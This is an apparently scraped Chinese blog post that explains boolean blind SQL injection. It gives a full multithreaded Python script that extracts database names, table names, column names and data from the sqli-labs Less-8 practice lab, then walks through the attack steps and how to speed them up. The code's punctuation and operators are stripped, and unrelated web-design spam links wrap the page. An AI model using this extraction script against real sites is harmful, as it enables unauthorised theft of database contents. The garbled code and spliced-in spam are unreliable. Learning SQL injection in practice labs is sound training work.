当前位置: 首页 > news >正文

网站行高济南网络公司排名

网站行高,济南网络公司排名,网站制作价钱多少,开发微信公众号公司什么是sql注入#xff1f; SQL 注入#xff08;SQL Injection#xff09;是一种常见的 Web 安全漏洞#xff0c;攻击者可以通过构造恶意 SQL 语句来访问数据库中的敏感信息。在某些情况下#xff0c;服务器不会直接返回查询结果#xff0c;而是通过布尔值#xff08;Tr…什么是sql注入 SQL 注入SQL Injection是一种常见的 Web 安全漏洞攻击者可以通过构造恶意 SQL 语句来访问数据库中的敏感信息。在某些情况下服务器不会直接返回查询结果而是通过布尔值True/False或时间延迟等方式提供间接反馈这类攻击被称为 盲注Blind SQL Injection。 布尔盲注代码 import requests import concurrent.futuresdef binary_search_character(url, query, index, low32, high127):while low high:mid (low high 1) // 2payload f1 AND ASCII(SUBSTRING(({query}),{index},1)) {mid} -- res {id: payload}r requests.get(url, paramsres)if You are in.......... in r.text:low midelse:high mid - 1return chr(low) if low 32 else def extract_data(url, query, max_length200):extracted_data [] * max_lengthwith concurrent.futures.ThreadPoolExecutor(max_workers10) as executor:future_to_index {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length 1)}for future in concurrent.futures.as_completed(future_to_index):index future_to_index[future]try:result future.result()if result:extracted_data[index - 1] resultprint(f: {.join(extracted_data).strip()})except Exception as exc:print(fError extracting character {index}: {exc})return .join(extracted_data).strip()if __name__ __main__:url http://127.0.0.1/sqlilabs/Less-8/index.phpdatabase_name extract_data(url, SELECT database())print(f数据库名: {database_name})table_name_query fSELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema{database_name}table_names extract_data(url, table_name_query)print(f表名: {table_names})table_name table_names.split(,)[0]column_name_query fSELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name{table_name} AND table_schema{database_name}column_names extract_data(url, column_name_query)print(f列名: {column_names})column_name column_names.split(,)[1]data_query fSELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}extracted_values extract_data(url, data_query)print(f数据: {extracted_values})print(f数据库名: {database_name})print(f表名: {table_names})print(f列名: {column_names})print(f数据: {extracted_values}) 代码主要内容 1二分法查找单个字符 while low high:mid (low high 1) // 2采用二分查找方法缩小可能的 ASCII 码范围。 SQL 注入 Payload payload f1 AND ASCII(SUBSTRING(({query}),{index},1)) {mid} -- SUBSTRING(({query}),{index},1): 取出 SQL 结果的第 index 个字符。ASCII(...): 获取该字符的 ASCII 码。 {mid}: 判断该字符的 ASCII 是否大于等于 mid。 2并发优化数据提取 with concurrent.futures.ThreadPoolExecutor(max_workers10) as executor:使用 ThreadPoolExecutor 并发执行多个字符的爆破提高速度。 future_to_index {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length 1)}提交多个任务每个任务负责获取 SQL 结果中的某个字符。 攻击流程 获取数据库名 database_name extract_data(url, SELECT database())获取表名 table_name_query fSELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema{database_name}获取列名 column_name_query fSELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name{table_name} AND table_schema{database_name}提取数据 data_query fSELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}代码优化 1. 并发优化 使用 ThreadPoolExecutor 并发执行查询同时获取多个字符提高数据提取效率。减少等待时间相比单线程依次查询每个字符多线程可以同时进行多个查询加快数据恢复。 2. 自动化数据提取 从数据库名到数据内容全程自动化 依次提取数据库名、表名、列名、数据无需手动输入 SQL 语句提高攻击自动化程度。 效果展示使用sqli-labs靶场的第8关
http://www.hkea.cn/news/14570899/

相关文章:

  • dw如何做商业网站wordpress 加广告位
  • 长春企业网站制作优化深圳有做网站最近价格
  • 网站建设域名注册西宁网站建设君博推荐
  • 温州建网站公司哪家好seo技术代理
  • 有哪些网站可以做店面设计软件贪便宜网站
  • 万户建站找回老网站
  • linux 网站服务器搭建外网加速
  • 可以做兼职的网站有哪些工作怎样给自己的网站做防红连接
  • 济南建设集团招聘信息网站利尔化学股票
  • 用钩针做花网站微信从事网站开发需要什么
  • 好用的磁力搜索引擎谷歌seo是做什么的
  • 怎么把在EXCEL做的查询系统做到网站上郑州网站建设工作室
  • 怀化职院网站百度云打开的wordpress
  • 网站建设买阿里云云服务器张家港网站建设
  • 建设学校网站前的需求分析报告找人做网站 自己购买服务器
  • wordpress有留言时邮件提醒宁波seo怎么选
  • 电子商务网站建设技能实训答案家具设计软件
  • 重庆最大的网站制作公司seo排名培训公司
  • 怎样做的英文网站商品seo关键词优化
  • 济宁网站建设制作设计百度动态排名软件
  • 哪个网站做餐饮推广最好母婴网站源码php
  • 门户网站样式马鞍山网站开发流程
  • 湖北智能网站建设制作星月教你做网站的文档
  • 超市网站建设策划书wordpress模板怎么修改字体
  • 浙江专业网页设计免费建站jquery上传wordpress
  • 图片设计师网站大学校园门户网站建设方案
  • 网站类网站建设pr值高的网站
  • 专业做物业网站的公司莆田建设信息网站
  • 狼人最新网站wordpress 页面生成器
  • 网站建设公司电话咨询android网站开发实例